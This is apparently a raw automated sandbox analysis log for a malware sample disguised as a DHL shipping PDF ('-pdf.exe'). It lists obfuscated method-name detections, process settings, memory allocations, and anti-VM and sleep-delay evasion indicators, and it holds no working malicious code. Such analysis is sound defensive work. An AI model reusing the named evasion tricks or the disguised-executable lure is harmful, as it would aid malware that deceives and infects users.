                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.8ab0000.7.raw.unpack, ErUi7lD1FrJSFkpax4.csHigh entropy of concatenated method names: 'UeIiwtuIyM', 'jwiifH8AFc', 'GP5iYvmYMZ', 'QeRiDBUgLI', 'lZZic6DkXR', 'up9ikVsMPg', 'KuDim7tHdW', 'zB9isjL9Mo', 'Tc7iuoSaYe', 'WTZiSh4CaK'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.8ab0000.7.raw.unpack, awiqG603sLp4n4D4Pi.csHigh entropy of concatenated method names: 'N31X4gDs4M', 'bh6Xi9goVO', 'NuBXalSu3I', 'Kfna8FIG3P', 'B0iazrEgCu', 'htfXbiS8mJ', 'FxLX51rNQT', 'qq9XpMclrN', 'NmdXVi7D9S', 'M4gXCgP6hW'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.8ab0000.7.raw.unpack, fIE1H5BiCREqRqSkOl.csHigh entropy of concatenated method names: 'aAiutRbCK4', 'oC2uxFIrSD', 'myJuh3kglP', 'tk6u11c8Nd', 'A6sueL7kSN', 'JNUu6TjHZV', 'vTMu0gU4Sd', 'KFUuPU4ayK', 'aTWujw5S8f', 'LR5uJNag6t'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.8ab0000.7.raw.unpack, LQxvD75CeVNpyj0oPCK.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'aYJ3u0m8gj', 'aUT3S76k24', 'CwQ3LuP546', 'z9i33GGlli', 'xgw39BUdgW', 'XaE3vDRD7p', 'JgC3HkXNiU'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.8ab0000.7.raw.unpack, yiG18QtkgBG0q72fMG.csHigh entropy of concatenated method names: 'xrIaOqC6qj', 'RECadPc6uQ', 'KQyaR0KVG4', 'qqFaXEeVy9', 'KARaT9eRwN', 'e9ERWoEQnU', 'JBRRquaeAj', 'wvFRyWGtno', 'NefRoINMhT', 'kllRBoP378'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.8ab0000.7.raw.unpack, MuxZ4DZLQy9qJCXI4U.csHigh entropy of concatenated method names: 'T5SmrXVfSB', 'AMrmKQSFtk', 'ToString', 'IXHm4DdOdY', 'jGYmdLDfFD', 'fBfmiWEUPX', 'v3nmRv0T0c', 'iJXmaQUKyh', 'kGomXxxKXW', 'tOsmTtyWoF'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.8ab0000.7.raw.unpack, nk1RHsjxXGk2crEfVF.csHigh entropy of concatenated method names: 'EsKXGPyr6m', 'fdUXF2CAUx', 'Y5hXnNpjVK', 'dQlXwH7TtP', 'Td4XgwpCRE', 'TZHXfVdg2x', 'xepXQZHbcG', 'Q4gXY6b6cD', 'bUiXDtX1ir', 'gqvXElWeOQ'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.8ab0000.7.raw.unpack, IukijGEZYdQjGrCs8a.csHigh entropy of concatenated method names: 'unWRgWvK5S', 'UErRQV91GE', 'tVfihCDovu', 'cWFi1oE44J', 'eM3ie0f3t5', 'qoCi6TpxWB', 'yiai0hP8VA', 'WPpiPPNBl3', 'CkCijUXMu2', 'CJqiJtLvpU'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.8ab0000.7.raw.unpack, jyMCAX5bjsK0ZXc3xrI.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'CMVSNdTnH9', 'toJS2I4Gx2', 'y1WSIk5Kx7', 'jxaSUwWFEX', 'FYZSM7cCwZ', 'jQYS72RMxp', 'WrHSZLHkZB'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.8ab0000.7.raw.unpack, SXeNjVTESUiPlIoGVN.csHigh entropy of concatenated method names: 'NQTVORTIqk', 'hlPV41o3Hv', 'RQ6VdPgZbO', 'bJ0VidnE9I', 'hnrVR7iCnL', 'RppVaQLIZb', 'XVTVXtd8Ly', 'wKMVTjvUMt', 'sdAVlQ2yR3', 'whHVrZOFnV'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.8ab0000.7.raw.unpack, xnApCVIMjrAdI14lEe.csHigh entropy of concatenated method names: 'LuOAYNVVHs', 'xlxADBl0J6', 'OL0AtQ7EN0', 'TLOAxttZHN', 'oBhA14XYjv', 'KsVAeMjED8', 'cL6A0H2A5U', 'w1uAP4U135', 'CxGAJjB2RQ', 'OhdAN7y352'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.8ab0000.7.raw.unpack, eVQ1hw554PPm3rQXRCb.csHigh entropy of concatenated method names: 'h85S8Xvo3Y', 'UoMSz2136K', 'P0nLbbdiTj', 'hmkL5eQgcf', 'MruLp8CpCm', 'AN7LVupXLR', 'sohLCKn59q', 'vAjLOGuoWN', 'Y46L4Y3qHT', 'XnTLdH4msA'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.8ab0000.7.raw.unpack, RMxiovdXSF96pWK4ss.csHigh entropy of concatenated method names: 'Dispose', 'fcv5B45FyA', 'BJwpxEWrFX', 'Feo4tAAH3f', 'K0o58JZ1Z8', 'MeX5zjNqDU', 'ProcessDialogKey', 'oPdpbIE1H5', 'gCRp5EqRqS', 'pOlppGNZtb'
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeFile created: \dhl shipping details ref id 446331798008765975594-pdf.exe
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeFile created: \dhl shipping details ref id 446331798008765975594-pdf.exeJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Yara detected AntiVM3
                  Source: Yara matchFile source: Process Memory Space: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe PID: 6716, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeMemory allocated: 11B0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeMemory allocated: 2B50000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeMemory allocated: 2980000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeMemory allocated: 8C50000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeMemory allocated: 9C50000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeMemory allocated: 9E50000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeMemory allocated: AE50000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeMemory allocated: 2E30000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeMemory allocated: 2EE0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeMemory allocated: 2E30000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 599890Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 599781Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 599671Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 599562Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 599453Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 599343Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 599234Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 599124Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 599015Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 598906Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 598796Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 598687Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 598578Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 598468Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 598359Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 598249Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 598140Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 598031Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 597921Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 597812Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 597702Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 597593Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 597484Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 597374Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 597253Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 597125Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 596973Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 596812Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 596621Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 596464Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 596359Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 596249Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 596140Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 596031Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 595921Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 595812Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 595703Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 595593Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 595484Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 595374Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 595265Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 595156Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 595046Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 594936Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 594828Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 594718Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 594609Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 594499Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 594390Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 594280Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeWindow / User API: threadDelayed 8362Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeWindow / User API: threadDelayed 1487Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 4152Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 2096Thread sleep count: 34 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 2096Thread sleep time: -31359464925306218s >= -30000sJump to behavior
